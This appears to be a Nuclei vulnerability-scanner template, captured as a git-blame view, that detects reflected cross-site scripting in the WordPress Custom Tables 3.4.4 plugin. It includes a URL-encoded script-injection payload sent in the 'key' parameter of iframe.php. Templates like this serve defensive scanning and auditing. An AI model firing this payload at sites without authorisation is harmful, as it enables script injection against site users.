2021-07-14 23:21:50 +00:00
|
|
|
id: wp-custom-tables-xss
|
|
|
|
|
|
|
|
info:
|
2022-09-23 17:53:08 +00:00
|
|
|
name: WordPress Custom Tables 3.4.4 - Cross-Site Scripting
|
2021-07-14 23:21:50 +00:00
|
|
|
author: daffainfo
|
2022-09-23 17:53:08 +00:00
|
|
|
severity: high
|
|
|
|
description: WordPress Custom Tables 3.4.4 plugin contains a cross-site scripting vulnerability via the key parameter.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252
|
2022-09-23 17:53:08 +00:00
|
|
|
- https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-custom-tables-key-parameter-cross-site-scripting-3-4-4/
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 7.2
|
|
|
|
cwe-id: CWE-79
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: wpscan,wordpress,xss,wp-plugin
|
2021-07-14 23:21:50 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-07-14 23:21:50 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2021-07-19 06:08:50 +00:00
|
|
|
- '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
2021-07-14 23:21:50 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2021-07-19 06:08:50 +00:00
|
|
|
- "</script><script>alert(document.domain)</script>"
|
2021-07-14 23:21:50 +00:00
|
|
|
part: body
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 4a0a00473045022073eb2474d2210eb181940ddd353c12a06e4f0c2fc66e0bca9967e060edbe0442022100defde9a210c312082609501d4088c66d930d048a1ea2905d281ad410597340e8:922c64590222798bb761d5b6d8e72950
|